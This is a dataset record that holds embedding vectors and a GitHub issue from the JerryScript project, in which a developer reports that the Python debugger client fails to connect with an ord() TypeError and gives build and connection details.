0.011761493049561977, 0.010158800520002842, 0.01756652258336544, -0.0038584512658417225, -0.012159011326730251, 0.014121362939476967, 0.0047228955663740635, 0.0008707543020136654, -0.015560001134872437, -0.012689035385847092, -0.004511517006903887, -0.0233463104814291, 0.005757705308496952, -0.014247559942305088, -0.0030224008951336145, -0.012335686013102531, -0.00913661066442728, 0.004290673416107893, 0.000018954089682665654, 0.010897048749029636, 0.01795773021876812, 0.017074355855584145, -0.011244088411331177, 0.01133873499929905, 0.0016579035436734557, -0.018550852313637733, -0.007634874898940325, -0.02445683814585209, -0.012392474338412285, 0.016973398625850677, -0.013503002002835274, 0.0037259450182318687, 0.009458410553634167, 0.005076245404779911, -0.00237879971973598, 0.02507520094513893, -0.014184461906552315, 0.011862450279295444, -0.010133560746908188, 0.019888533279299736, 0.017137454822659492, -0.019106116145849228, 0.012222109362483025, 0.0030208234675228596, 0.023043440654873848, -0.0190177783370018, 0.02693028561770916, -0.02301819995045662, 0.003785888198763132, -0.0037574940361082554, 0.02197077125310898, 0.004877486266195774, -0.009723423048853874, 0.028646554797887802, -0.01133242528885603, -0.02260175347328186, -0.03404775634407997, -0.000045696855522692204, -0.003363130846992135, 0.006959724705666304, 0.024217065423727036, -0.00441055977717042, 0.0027447689790278673, 0.023409409448504448, -0.0010963301174342632, -0.014474713243544102, 0.008688613772392273, 0.018424656242132187, 0.0018803245620802045, -0.01620360277593136, 0.0019024088978767395, 0.010682514868676662, -0.027132200077176094, 0.01145862229168415, -0.009836999699473381, 0.02265223115682602, -0.011111581698060036, 0.002689558081328869, 0.008505629375576973, -0.002039647428318858, -0.0044042500667274, -0.024355880916118622, -0.001762015512213111, 0.01077716238796711, 0.0136544369161129, 0.021617421880364418, -0.0012209489941596985, -0.012083293870091438, 0.009363763965666294, 0.011868759989738464, 0.008019773289561272, -0.005786099471151829, 0.002774740569293499, -0.006492798216640949, -0.001823536236770451, -0.0017525508301332593, 0.002766853431239724, 0.029201818630099297, 0.005360187031328678, -0.005839732475578785, -0.009843309409916401, -0.027435069903731346, -0.00037464519846253097, 0.011692085303366184, -0.010695134289562702, -0.00878957100212574, 0.004987908061593771, -0.010808710940182209, 0.014979498460888863, 0.00456199562177062, -0.020267121493816376, 0.00114523118827492, 0.007988224737346172, -0.000522531452588737, -0.02617310732603073, -0.01399516686797142, 0.0002103928563883528, 0.02367442101240158, -0.0004744191246572882, -0.016998639330267906, 0.004047745373100042, 0.019838055595755577, 0.022021250799298286, -0.0007134033367037773, -0.0030003164429217577, 0.0179829690605402, -0.012373545207083225, -0.004975288175046444, 0.012651177123188972, -0.008530868217349052, -0.009231257252395153, 0.014727105386555195, 0.002508151112124324, -0.0006128406967036426, 0.006404460873454809, -0.00027782897814176977, 0.010720374062657356, 0.003826902015134692, 0.011868759989738464, -0.001823536236770451, 0.012972977012395859, -0.020304981619119644, 0.0005950943450443447, 0.0015466931508854032, -0.012821542099118233, 0.00663792435079813, -0.029201818630099297, -0.026450740173459053, 0.0017982969293370843, 0.0015253975288942456, 0.012524980120360851, -0.004243349656462669, 0.015862872824072838, 0.00027565998607315123, -0.019964251667261124, -0.01094752736389637, -0.006688402500003576, 0.003087076358497143, -0.014790203422307968, -0.003937324043363333, -0.01682196371257305, 0.012890949845314026, -0.019623521715402603, 0.004593544639647007, -0.00228415266610682, 0.0010868654353544116, 0.01349038165062666, -0.021276691928505898, 0.0131370322778821, -0.016241461038589478, -0.0011136821703985333, 0.009262806735932827, -0.012373545207083225, -0.010392263531684875, 0.003524031024426222, -0.018159644678235054, -0.010669895447790623, -0.016355037689208984, -0.016771486029028893, 0.005874436814337969, -0.00967294443398714, -0.008291095495223999, -0.010650965385138988, 0.007969294674694538, -0.0003683353716041893, 0.0243811197578907, 0.020014729350805283, 0.013919449411332607, -0.008196447975933552, -0.006625304464250803, 0.010152490809559822, 0.014285418204963207, -0.022361980751156807, -0.006461249198764563, 0.026753610000014305, -0.020620470866560936, 0.008127040229737759, -0.018134405836462975, 0.004196026362478733, 0.02695552445948124, -0.00913661066442728, 0.011982336640357971, -0.008941005915403366, 0.005388581193983555, -0.0141718415543437, 0.0031138930935412645, 0.008070251904428005, 0.005066780373454094, 0.0033473563380539417, 0.0025491646956652403, -0.0005954887019470334, 0.0021200974006205797, 0.006701022386550903, 0.01722579263150692, 0.004164477344602346, 0.0008273743442259729, -0.02372490055859089, 0.0141718415543437, 0.013856351375579834, 0.007994534447789192, -0.029353253543376923, 0.01791987195611, 0.0022257869131863117, -0.013439903035759926, -0.006417080760002136, -0.005562101025134325, -0.01759176142513752, 0.014840682037174702, -0.009067202918231487, 0.011111581698060036, 0.017351988703012466, 0.0019197608344256878, -0.015698816627264023, 0.004549375735223293, 0.012108532711863518, 0.001179146463982761, 0.01905563846230507, -0.01794511079788208, -0.010158800520002842, -0.02263961173593998, -0.01080240122973919, -0.014298038557171822, -0.006344517692923546, 0.0038174374494701624, -0.019219692796468735, 0.012392474338412285, -0.01723841205239296, 0.01942160725593567, 0.003014513524249196, 0.01754128187894821, 0.007944055832922459, -0.0000022768322196498048, 0.009836999699473381, 0.001738353748805821, -0.013730155304074287, 0.009773901663720608, -0.004855401813983917, 0.034628257155418396, 0.009010414592921734, -0.014966878108680248, -0.0063003492541611195, 0.005552635993808508, -0.0008463037665933371, -0.002533390186727047, -0.008474079892039299, -0.01147124171257019, 0.011540649458765984, 0.015572620555758476, 0.028924185782670975, 0.012676415964961052, -0.006306658964604139, -0.01132611557841301, 0.013086553663015366, 0.016342418268322945, 0.008335264399647713, -0.004426334518939257, -0.008133349940180779, -0.005858662072569132, 0.00968556385487318, 0.010089392773807049, 0.014664007350802422, -0.0066631631925702095, 0.02801557257771492, -0.005199286621063948, 0.003760649124160409, -0.005735620856285095, 0.0021264073438942432, -0.01398254744708538, 0.033240098506212234, -0.013755394145846367, 0.009092441760003567, -0.00864444486796856, -0.002680093515664339, 0.014133983291685581, 0.010543699376285076, -0.014979498460888863, -0.017377227544784546, 0.017023878172039986, 0.0015230312710627913, 0.006688402500003576, 0.0018755921628326178, -0.01163529697805643, 0.01184982992708683, -0.006511727813631296, -0.008896837942302227, 0.015698816627264023, 0.0025144608225673437, 0.009590917266905308, 0.013427283614873886, 0.017844153568148613, 0.007552847266197205, 0.018904201686382294, 0.012411403469741344, -0.0003691241145133972, 0.007950365543365479, -0.005357031710445881, -0.006499108392745256, -0.01980019547045231, -0.011774112470448017, 0.011559578590095043, 0.0036344528198242188, 0.01649385318160057, 0.02043117769062519, 0.008720162324607372, -0.008959935978055, 0.014537811279296875, -0.00016957624757196754, -0.007489749230444431, 0.007218427024781704, -0.009224947541952133, -0.018033448606729507, -0.017528662458062172, 0.007817859761416912, -0.011969717219471931, -0.01349038165062666, -0.002599643310531974, 0.02508782036602497, 0.014802822843194008, 0.011193609796464443, 0.0052055963315069675, -0.0019513099687173963, 0.009269116446375847, 0.030261866748332977, 0.0016563261160627007, -0.0052245259284973145, 0.02687980607151985, 0.020355459302663803, 0.012247348204255104, 0.014247559942305088, 0.00717425812035799, 0.0007966139819473028, 0.012506050989031792, 0.0007003893260844052, -0.0012935118284076452, 0.01620360277593136, 0.006224631331861019, -0.01582501269876957, 0.02690504677593708, 0.008858978748321533, 0.01617836207151413, 0.0009409509948454797, 0.0031391324009746313, -0.013528240844607353, -0.018538232892751694, 0.02733411267399788, 0.008190138265490532, 0.0011988646583631635, -0.002112210262566805, -0.028621315956115723, 0.014853301458060741, -0.01905563846230507, -0.011105271987617016, 0.03091808781027794, -0.00948996003717184, -0.011427072808146477, -0.006312968675047159, 0.010467980988323689, -0.00708592077717185, 0.008871598169207573, -0.008549797348678112, -0.0038300571031868458, 0.02115049585700035, 0.023901574313640594, -0.005704071838408709, -0.0127710634842515, 0.012960357591509819, -0.03982754424214363, -0.005366496741771698, -0.00012225264799781144, 0.007836788892745972, -0.0023235890548676252, -0.003924704156816006, -0.019648760557174683, 0.012808921746909618, -0.020229263231158257, -0.012638556770980358, -0.00034861720632761717, -0.008032392710447311, -0.00707961106672883, -0.012228419072926044, -0.005536861717700958, -0.009389002807438374, 0.013338946737349033, 0.008663373999297619, 0.008575037121772766, -0.013149651698768139, -0.011427072808146477, 0.0016437064623460174, 0.008518248796463013, 0.006839838344603777, 0.0034830172080546618, -0.025188777595758438, -0.00012452022929210216, -0.03220529109239578, 0.004259124398231506, -0.010587867349386215, 0.015067835338413715, -0.005142498295754194, 0.020039968192577362, -0.003189610783010721, 0.01543380506336689, -0.010518459603190422, -0.009742352180182934, 0.013503002002835274, -0.007458199746906757, 0.01754128187894821, 0.00966663472354412, -0.01113682147115469, 0.013768013566732407, 0.004214955493807793, 0.027561265975236893, 0.00014266095240600407, -0.009363763965666294, 0.012607008218765259, 0.016241461038589478, 0.00237564486451447, -0.01727627031505108, -0.0022131672594696283, -0.03472921624779701, 0.0002346461988054216, -0.00026560373953543603, -0.013843731954693794, -0.015257129445672035, 0.006884006783366203, 0.01150909997522831, 0.0005808972637169063, -0.004211800638586283, 0.0008967822650447488, 0.002049111993983388, -0.0003285046841483563, 0.008865288458764553, -0.007010203320533037, 0.014664007350802422, -0.009742352180182934, 0.008896837942302227, -0.01182459108531475, -0.013376805000007153, -0.03018615022301674, -0.006511727813631296, 0.00005560523277381435, 0.011061104014515877, -0.021339790895581245, 0.012796302326023579, 0.0048459372483193874, -0.015711436048150063, 0.020582612603902817, 0.0054075103253126144, -0.006972344126552343, 0.004804923199117184, -0.021352410316467285, -0.0010442741913720965, 0.015951208770275116, 0.027056481689214706, 0.018172264099121094, -0.023863716050982475, 0.01791987195611, -0.008776950649917126, 0.001140498905442655, 0.029302775859832764, -0.0006152068381197751, -0.0416952483355999, 0.012171630747616291, -0.036470722407102585, -0.0005655170534737408, 0.007300454657524824, 0.009811760857701302, 0.01721317134797573, 0.005757705308496952, -0.007874648086726665, -0.0014725527726113796, -0.010089392773807049, 0.008063942193984985, 0.006265644915401936, -0.00930697564035654, -0.002490798942744732, -0.01165422610938549, -0.01200126577168703, -0.011938167735934258, -0.014828062616288662, 0.03869177773594856, 0.02332107163965702, 0.017503423616290092, 0.02332107163965702, 0.012701654806733131, -0.011199919506907463, -0.014891160652041435, -0.012165321037173271, -0.0027431915514171124, 0.006940795108675957, -0.006606374867260456, 0.002659586491063237, -0.005177202168852091, -0.0024513627868145704, 0.0006956569850444794, 0.0035114113707095385, -0.0014709753450006247, -0.0013148074503988028, -0.011357665061950684, -0.0066947126761078835, -0.012386164627969265, 0.01166053581982851, 0.0017572831129655242, -0.015496903099119663, 0.0022604907862842083, 0.012493431568145752, 0.009931647218763828, -0.014247559942305088, 0.004123463295400143, -0.019308030605316162, 0.031094763427972794, -0.0062971943989396095, -0.020885484293103218, 0.024620894342660904, 0.010083082132041454, 0.006839838344603777, 0.007388792000710964, 0.01400778628885746, 0.005322327837347984, -0.0013589761219918728, 0.01399516686797142, 0.0030933863017708063, -0.012127461843192577, -0.012588078156113625, -0.004366391338407993, 0.007988224737346172, 0.02329583279788494, 0.015989068895578384, 0.00912399124354124, 0.018159644678235054, 0.005839732475578785, 0.004767064470797777, -0.024242304265499115, -0.002268378157168627, -0.007382482290267944, 0.014954258687794209, 0.016026927158236504, -0.002664318773895502, -0.011010625399649143, -0.003120203036814928, -0.023825857788324356, -0.00044799677561968565, -0.012726894579827785, 0.011521720327436924, -0.02687980607151985, -0.011729943566024303, -0.007414031308144331, 0.010695134289562702, -0.017856772989034653, 0.024204446002840996, 0.018828485161066055, -0.008221687749028206, -0.008202757686376572, 0.004685036838054657, 0.0017241566674783826, -0.007098540663719177, -0.005016302224248648, -0.009439481422305107, 0.005350722000002861, 0.01689768210053444, -0.00934483390301466, -0.005394890904426575, 0.023800617083907127, -0.010284996591508389, -0.0027589660603553057, -0.008190138265490532, -0.006060576066374779, 0.010474290698766708, -0.005524241831153631, 0.018512994050979614, 0.0127710634842515, 0.0038300571031868458, -0.003128090174868703, -0.02406563051044941, -0.001629509381018579, -0.014310657978057861, -0.011900308541953564, -0.013212749734520912, -0.006445474922657013, 0.0073761725798249245, 0.02483542636036873, -0.000346645392710343, -0.01166053581982851, 0.002568094292655587, 0.008152279071509838, 0.009105061180889606, 0.01680934429168701, -0.004265434108674526, -0.02014092542231083, 0.022046489641070366, -0.005107794422656298, -0.0029987390153110027, -0.015042596496641636, 0.006451784633100033, 0.003631297964602709, 0.017112215980887413, 0.0021942376624792814, -0.03477969393134117, 0.007294144947081804, 0.0024261234793812037, -0.01726365089416504, -0.0037038607988506556, 0.010120941326022148, 0.01114313118159771, 0.025996433570981026, -0.014184461906552315, 0.007597015704959631, 0.022361980751156807, 0.011755183339118958, 0.013553479686379433, 0.004773374181240797, -0.017882011830806732, 0.010467980988323689, 0.021680520847439766, 0.0186518095433712, 0.018891582265496254, -0.024305403232574463, 0.008316334336996078, -0.0037133253645151854, -0.0051330337300896645, 0.00673888111487031, 0.055475883185863495, -0.006303504109382629, -0.006044801790267229, 0.007729521952569485, 0.01164160668849945, -0.012651177123188972, 0.014487332664430141, 0.0028646555729210377, -0.02515091747045517, 0.009660325013101101, 0.008518248796463013, 0.01683458313345909, 0.01399516686797142, -0.0049216547049582005, -0.008871598169207573, 0.004281208850443363, 0.02436850033700466, 0.01113682147115469, 0.010379644110798836, -0.014739724807441235, 0.025365451350808144, -0.006312968675047159, 0.019951632246375084, 0.014689246192574501, 0.009982125833630562, 0.001571932341903448, -0.004716585855931044, 0.010442742146551609, -0.002221054397523403, -0.0006309814052656293, -0.01131349615752697, -0.0016050589038059115, -0.013402044773101807, 0.023043440654873848, -0.01933326944708824, 0.007836788892745972, -0.005883901380002499, 0.015257129445672035, 0.017781054601073265, 0.00689662666991353, 0.020355459302663803, -0.007306764367967844, -0.002555474638938904, 0.036798834800720215, 0.007218427024781704, -0.0068587674759328365, 0.0022147446870803833, 0.011572198942303658, -0.008436220698058605, -0.01562309917062521, -0.014474713243544102, 0.018550852313637733, 0.0039341687224805355, -0.006246715784072876, 0.014929019846022129, 0.010493220761418343, -0.016342418268322945, 0.039978981018066406, -0.016683148220181465, -0.0052970885299146175, -0.031473349779844284, -0.027435069903731346, 0.029328014701604843 ]
65
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
currently I am working for creating debugger port for my emscripten build app. But when I use `jerry_client.py` connect to server, it came with a exception `TypeError: ord() expected string of length 1, but int found`. I guess it may be my debugger port's error. so I build a jerry binary on window. and again I use `jerry_client.py` with parameter `--channel=rawpacket --protocol=tcp 127.0.0.1:9091` and jerry binary with parameter `--debug-port 9091 --debug-channel rawpacket --start-debug-server`. it get a same error. so I debug `jerry_client.py` and found the line throwing error at [this](https://github.com/jerryscript-project/jerryscript/blob/386ec44d4dcf35bba85111b4d8bae7e45cc101a3/jerry-debugger/jerry_client_main.py#L311). the window binary `jerry` send debugger config `b'\x01\x01\t\x00\x00\x00\x7f\x02'` the emscripten app send debugger config `0101 0900 0000 7f04 ` ###### JerryScript revision just use master with SHA 6649940ea6898c18fac45efa4d712475ef52a5b8 ###### Build platform on windows, build parameter is `python .\tools\build.py --jerry-debugger=on --cmake-param="-Bwindows" `
connect to debugger failed
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4769/comments
2
2021-09-15T14:13:09
2021-10-18T07:32:28Z
https://github.com/jerryscript-project/jerryscript/issues/4769
997,136,659
4,769
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : connect to debugger failed Issue date: --- start body --- currently I am working for creating debugger port for my emscripten build app. But when I use `jerry_client.py` connect to server, it came with a exception `TypeError: ord() expected string of length 1, but int found`. I guess it may be my debugger port's error. so I build a jerry binary on window. and again I use `jerry_client.py` with parameter `--channel=rawpacket --protocol=tcp 127.0.0.1:9091` and jerry binary with parameter `--debug-port 9091 --debug-channel rawpacket --start-debug-server`. it get a same error. so I debug `jerry_client.py` and found the line throwing error at [this](https://github.com/jerryscript-project/jerryscript/blob/386ec44d4dcf35bba85111b4d8bae7e45cc101a3/jerry-debugger/jerry_client_main.py#L311). the window binary `jerry` send debugger config `b'\x01\x01\t\x00\x00\x00\x7f\x02'` the emscripten app send debugger config `0101 0900 0000 7f04 ` ###### JerryScript revision just use master with SHA 6649940ea6898c18fac45efa4d712475ef52a5b8 ###### Build platform on windows, build parameter is `python .\tools\build.py --jerry-debugger=on --cmake-param="-Bwindows" ` --- end body ---
1,267
[ -0.0012988318921998143, 0.012303398922085762, -0.007036163471639156, -0.015546433627605438, 0.01816387102007866, 0.011756900697946548, 0.03025873750448227, 0.05902179703116417, -0.009419902227818966, 0.03675919026136398, -0.007428059820085764, 0.019458210095763206, -0.0021770040038973093, 0.019328774884343147, -0.002072738017886877, 0.010714239440858364, -0.03411298990249634, -0.00516296923160553, -0.03175441920757294, 0.006989423185586929, 0.05746859312057495, -0.0004458274052012712, -0.036903005093336105, 0.03385411947965622, 0.011016251519322395, -0.00784512422978878, 0.004709951113909483, -0.00898845586925745, -0.009693151339888573, -0.007593447808176279, 0.002401715377345681, 0.0018030842766165733, -0.006284728646278381, 0.013540210202336311, 0.04791925847530365, -0.034228041768074036, 0.014374339021742344, 0.03457319736480713, -0.0023999176919460297, -0.008600154891610146, -0.018422739580273628, -0.01127511914819479, -0.022967303171753883, 0.02267967164516449, 0.001613427884876728, 0.05418960377573967, 0.0014462425606325269, 0.016064168885350227, -0.02476499415934086, -0.0009199684718623757, -0.0019792579114437103, -0.003007537452504039, -0.011124113574624062, -0.016711337491869926, 0.01375593338161707, -0.01241845078766346, 0.018336450681090355, -0.005587224382907152, -0.013770314864814281, -0.002647999208420515, -0.003063265699893236, -0.01520127709954977, -0.01274203509092331, -0.013914129696786404, -0.003933348227292299, 0.07219527661800385, -0.031409259885549545, 0.030603894963860512, 0.0030758497305214405, 0.013892557471990585, -0.004469060339033604, -0.01639494299888611, 0.040814779698848724, 0.024808138608932495, 0.03719063475728035, -0.03368154168128967, -0.001654774765484035, 0.03529227524995804, -0.0073309848085045815, -0.03770837187767029, -0.010498516261577606, -0.034026697278022766, -0.003926157485693693, -0.013338868506252766, 0.007413678336888552, -0.008139945566654205, -0.0456182137131691, -0.0525788739323616, -0.0012008576886728406, 0.006119340658187866, 0.0051018474623560905, 0.042655616998672485, -0.010937153361737728, -0.025527214631438255, 0.015172514133155346, -0.01200138684362173, -0.0065831453539431095, 0.012662936933338642, -0.03316380828619003, 0.016323035582900047, 0.02726737968623638, -0.0008071633637882769, -0.023715142160654068, -0.0045193955302238464, 0.010512897744774818, 0.009534954093396664, 0.04026828333735466, -0.00843476690351963, 0.008068038150668144, 0.051140718162059784, -0.019328774884343147, -0.00424614641815424, -0.036040112376213074, -0.03278988599777222, 0.004048400558531284, 0.020019089803099632, -0.00028852943796664476, 0.004192215856164694, -0.028748678043484688, 0.005457790568470955, -0.004695569630712271, 0.007499967701733112, -0.02712356485426426, -0.038858894258737564, -0.059251900762319565, 0.01525880303233862, -0.008341287262737751, 0.022636527195572853, -0.0036618970334529877, -0.026174383237957954, -0.032070811837911606, -0.0002993155794683844, 0.020277956500649452, -0.019961563870310783, 0.021658584475517273, 0.008190280757844448, -0.0294102281332016, 0.030086159706115723, -0.0007914335583336651, -0.013813459314405918, -0.024880046024918556, -0.01921372301876545, 0.0013473695144057274, -0.0041742390021681786, 0.010714239440858364, 0.016438087448477745, 0.010843673720955849, 0.005518911872059107, -0.030805235728621483, -0.016351798549294472, -0.024693086743354797, -0.03719063475728035, -0.005040726158767939, 0.013080000877380371, 0.022866632789373398, -0.004763881675899029, -0.005709467455744743, 0.020277956500649452, -0.02267967164516449, -0.04044086113572121, -0.03667290136218071, -0.030632657930254936, 0.016179220750927925, 0.0010112012969329953, -0.0203354824334383, 0.02385895699262619, 0.019199341535568237, 0.0021050963550806046, -0.027296142652630806, 0.011347026564180851, 0.005450599826872349, 0.02313988097012043, 0.0383123941719532, 0.019990326836705208, -0.05306784436106682, 0.007003805134445429, 0.012037340551614761, 0.03483206406235695, -0.014374339021742344, -0.01075738389045, 0.01849464699625969, 0.013655262067914009, -0.009232942014932632, -0.0031926995143294334, 0.0221619363874197, -0.02131342701613903, 0.004914887715131044, -0.004641638603061438, 0.03290494158864021, -0.016035405918955803, 0.027612537145614624, -0.006655052769929171, -0.009685960598289967, -0.033882882446050644, -0.002928439062088728, 0.04469779506325722, -0.015043079853057861, -0.027555011212825775, -0.016912678256630898, 0.013849413022398949, 0.036040112376213074, -0.015014316886663437, -0.05643312260508537, -0.06673029810190201, -0.008959692902863026, -0.013288533315062523, -0.023844575509428978, 0.003340110182762146, 0.01525880303233862, -0.044812846928834915, 0.028676770627498627, -0.030172448605298996, 0.018005674704909325, -0.02843228355050087, -0.00383267761208117, -0.010570424608886242, 0.007902650162577629, 0.017948148772120476, -0.04360479861497879, 0.0004408837703522295, 0.034228041768074036, -0.04377737641334534, -0.022176317870616913, 0.03555114194750786, -0.03227215260267258, -0.028777441009879112, -0.03765084594488144, -0.009319230914115906, -0.0012035542167723179, -0.00862891785800457, 0.03627021610736847, -0.020608732476830482, -0.018480265513062477, 0.011454888619482517, -0.0061840577982366085, -0.0015900578582659364, 0.018149489536881447, -0.009650005958974361, -0.03992312774062157, 0.02019166760146618, 0.001874991925433278, 0.020982651039958, -0.021917451173067093, -0.05913684889674187, 0.007359747774899006, -0.009592480026185513, -0.013295724056661129, -0.030172448605298996, 0.007363343145698309, -0.002615640638396144, -0.04737275838851929, -0.0011181639274582267, 0.01784747838973999, -0.028187798336148262, -0.0073381755501031876, 0.018192635849118233, 0.020162904635071754, 0.014554107561707497, 0.004540967755019665, -0.0262894369661808, -0.01908428966999054, -0.01108096819370985, -0.03486082702875137, 0.0067593189887702465, 0.015244421549141407, -0.011260737664997578, -0.04829317703843117, -0.005594415124505758, 0.013108763843774796, -0.031236682087183, 0.00830533355474472, -0.052981555461883545, -0.009801012463867664, 0.009491809643805027, -0.02137095294892788, -0.010124596767127514, 0.020378626883029938, 0.015719011425971985, -0.0011190627701580524, -0.01415142510086298, -0.02053682506084442, 0.01653875969350338, 0.03612640127539635, 0.010289984755218029, -0.004400748293846846, 0.008751160465180874, -0.011677801609039307, -0.010448181070387363, -0.024362310767173767, -0.029136978089809418, -0.029453372582793236, -0.033307623118162155, 0.004558945074677467, 0.014302431605756283, 0.013231007382273674, 0.005749016534537077, -0.011231974698603153, -0.0037176255136728287, -0.002245316281914711, 0.016064168885350227, -0.005454195197671652, -0.024880046024918556, -0.013626499101519585, 0.022262608632445335, -0.03077647276222706, -0.021284664049744606, 0.04771791398525238, -0.000326955079799518, 0.009319230914115906, -0.0015010721981525421, 0.048206888139247894, -0.036298979073762894, -0.0011415339540690184, -0.018739132210612297, -0.05338423699140549, -0.02236327901482582, 0.0396067313849926, -0.00025864283088594675, -0.02354256436228752, -0.03247349336743355, -0.02273719757795334, -0.017991293221712112, -0.05401702597737312, 0.013784696348011494, 0.026188764721155167, -0.0014857917558401823, 0.00788107793778181, 0.023815812543034554, -0.01869598776102066, 0.0058928318321704865, 0.003821891499683261, -0.016423705965280533, -0.04018199443817139, -0.004487037193030119, -0.049127306789159775, -0.031610600650310516, -0.0324159674346447, 0.027813877910375595, 0.045014187693595886, -0.021931832656264305, -0.022593382745981216, 0.016222365200519562, -0.014827356673777103, -0.027209853753447533, 0.013000902719795704, -0.01594911701977253, 0.004817812237888575, 0.04386366531252861, 0.03209957480430603, 0.013123145326972008, 0.0009806405287235975, -0.005511721130460501, -0.004001660738140345, 0.047228943556547165, 0.014640397392213345, -0.054160840809345245, -0.042598091065883636, -0.009908873587846756, 0.01895485632121563, 0.011332645080983639, -0.046567391604185104, -0.027540629729628563, 0.008600154891610146, 0.04202282801270485, 0.0029194504022598267, -0.014884883537888527, 0.00415266677737236, -0.015905972570180893, -0.05787127465009689, -0.002135657239705324, -0.011850380338728428, 0.03333638608455658, -0.045992132276296616, 0.005594415124505758, -0.0335952527821064, -0.0455031581223011, 0.004936459939926863, -0.011965432204306126, -0.014870502054691315, 0.017142783850431442, -0.007133238483220339, -0.05289526656270027, -0.019055526703596115, -0.03983683884143829, -0.00009724385745357722, 0.010031117126345634, 0.000002822936949087307, 0.006230797618627548, -0.010800528340041637, 0.04852328076958656, -0.004364794120192528, -0.004821407608687878, -0.04883967339992523, -0.029180124402046204, -0.01758860982954502, 0.028604863211512566, 0.007701308932155371, -0.009340803138911724, 0.03687424212694168, -0.0003067310608457774, -0.005083870608359575, -0.006777295842766762, 0.0023585709277540445, -0.016754481941461563, -0.0035576308146119118, -0.02548407018184662, -0.021212756633758545, -0.025182059034705162, 0.02935270220041275, 0.010088643059134483, 0.023902101442217827, -0.03086276166141033, -0.012080485001206398, 0.01574777439236641, 0.03221462666988373, 0.014302431605756283, 0.016164839267730713, -0.00018066796474158764, -0.027698826044797897, -0.011907906271517277, 0.020277956500649452, 0.004321649670600891, 0.022636527195572853, -0.03224338963627815, 0.00625596521422267, -0.003962111193686724, -0.004835789557546377, 0.035522378981113434, 0.029971107840538025, -0.001512757153250277, -0.06086263433098793, -0.018782278522849083, 0.003458757884800434, 0.048408228904008865, 0.013231007382273674, -0.035723719745874405, 0.014093899168074131, -0.022075647488236427, -0.03267483413219452, -0.011728137731552124, 0.002536542247980833, 0.011749709956347942, 0.004713546484708786, -0.009290467947721481, -0.020939506590366364, 0.01574777439236641, -0.06333625316619873, 0.012310589663684368, 0.01823578029870987, 0.018710369244217873, 0.02979853004217148, -0.006086982320994139, 0.001602641656063497, -0.021299045532941818, -0.001699717016890645, 0.009333612397313118, -0.053959500044584274, 0.001755445497110486, 0.034745775163173676, 0.0059611438773572445, -0.0010597389191389084, -0.006496855989098549, -0.0023711547255516052, 0.022205080837011337, 0.0030201212503015995, 0.01510060578584671, 0.023772668093442917, -0.03641403466463089, 0.01510060578584671, -0.02641887031495571, 0.02700851298868656, -0.021931832656264305, 0.050622984766960144, -0.0013401787728071213, -0.011440507136285305, -0.029827293008565903, -0.013813459314405918, 0.03483206406235695, 0.02352818287909031, 0.004325245041400194, -0.026562685146927834, -0.03983683884143829, -0.01791938580572605, 0.018063200637698174, 0.022967303171753883, -0.019256867468357086, 0.030431317165493965, 0.006450116168707609, 0.022334516048431396, -0.004206597339361906, 0.035407327115535736, 0.01876789703965187, -0.012015768326818943, -0.03117915615439415, -0.01333167776465416, 0.007931413128972054, -0.0013195053907111287, -0.005666322540491819, 0.015834063291549683, 0.02104017697274685, 0.025210822001099586, -0.03609763830900192, 0.03609763830900192, -0.0010588400764390826, 0.008017702959477901, 0.012109247967600822, -0.027281761169433594, 0.07570437341928482, -0.02692222408950329, -0.0203354824334383, 0.0010705251479521394, -0.03779466077685356, -0.011684993281960487, 0.004799835383892059, -0.017416032031178474, -0.03730568662285805, -0.022406423464417458, 0.00488612474873662, 0.02378704957664013, 0.029971107840538025, -0.022003740072250366, -0.03687424212694168, -0.03313504531979561, 0.04639481380581856, 0.037880949676036835, 0.016495615243911743, -0.007694118190556765, -0.02196059562265873, -0.05695085600018501, -0.030028633773326874, -0.047027602791786194, 0.016380561515688896, -0.020105378702282906, 0.041677672415971756, -0.01843712106347084, 0.018063200637698174, -0.0019990326836705208, 0.006299110129475594, -0.010491325519979, 0.008959692902863026, 0.02347065694630146, 0.06868618726730347, 0.0016889309044927359, 0.023369986563920975, -0.01163465715944767, 0.0001157263686764054, -0.016754481941461563, 0.017372887581586838, 0.014618825167417526, 0.012245872057974339, -0.004551754333078861, -0.020939506590366364, -0.0018965642666444182, -0.004195811226963997, -0.015905972570180893, -0.044093769043684006, -0.014266476966440678, 0.004393557086586952, -0.00031616893829777837, 0.005087465979158878, 0.00397289777174592, 0.032070811837911606, 0.0036780762020498514, -0.005058703012764454, -0.01150522381067276, -0.02131342701613903, -0.004515800159424543, 0.03281864896416664, -0.030575131997466087, 0.03920404985547066, 0.006554381921887398, -0.015143750235438347, 0.004792644642293453, 0.01284270640462637, -0.02726737968623638, 0.02105455845594406, 0.0383123941719532, 0.007830742746591568, 0.03486082702875137, 0.005810137838125229, 0.017171546816825867, -0.010944344103336334, -0.029597187414765358, 0.01000235415995121, 0.0034569601994007826, -0.026462014764547348, 0.004185025114566088, -0.020148523151874542, 0.01594911701977253, -0.056059204041957855, -0.0049220784567296505, 0.0012565861688926816, -0.0004903202643617988, 0.01461163442581892, 0.028216561302542686, -0.006450116168707609, -0.017142783850431442, 0.02974100410938263, 0.052521347999572754, -0.006957064848393202, -0.005939571652561426, 0.047689151018857956, 0.03327886015176773, -0.005421836860477924, -0.016121694818139076, 0.013856603763997555, -0.018739132210612297, -0.00648606987670064, -0.012080485001206398, 0.004537372384220362, 0.0025275538209825754, 0.010405036620795727, 0.05542641505599022, -0.036586612462997437, -0.023844575509428978, -0.013223816640675068, -0.029108215123414993, -0.001396806095726788, 0.01424490474164486, 0.02313988097012043, 0.034228041768074036, -0.028202179819345474, 0.007302221842110157, 0.004623661749064922, 0.011663420125842094, 0.0478617288172245, -0.008743969723582268, -0.03301999345421791, 0.0006094173295423388, -0.028159035369753838, -0.023384368047118187, 0.014539726078510284, 0.0065400004386901855, 0.004213788080960512, -0.017286598682403564, 0.011871952563524246, 0.006601122207939625, 0.007039758842438459, -0.01875351555645466, -0.03802476450800896, -0.01563272252678871, -0.00007977254426805303, -0.03255978226661682, 0.012360924854874611, -0.021140849217772484, 0.008772732689976692, -0.008499483577907085, 0.029237650334835052, -0.002955404343083501, 0.01190071552991867, 0.0017167951446026564, -0.00679886806756258, -0.0063638268038630486, 0.00478904927149415, -0.009707532823085785, -0.008118373341858387, 0.01941506564617157, 0.013058428652584553, 0.0015469132922589779, 0.010671094991266727, -0.011749709956347942, 0.014503772370517254, 0.010138978250324726, -0.016941441223025322, 0.03511969372630119, -0.003246630309149623, 0.014654778875410557, 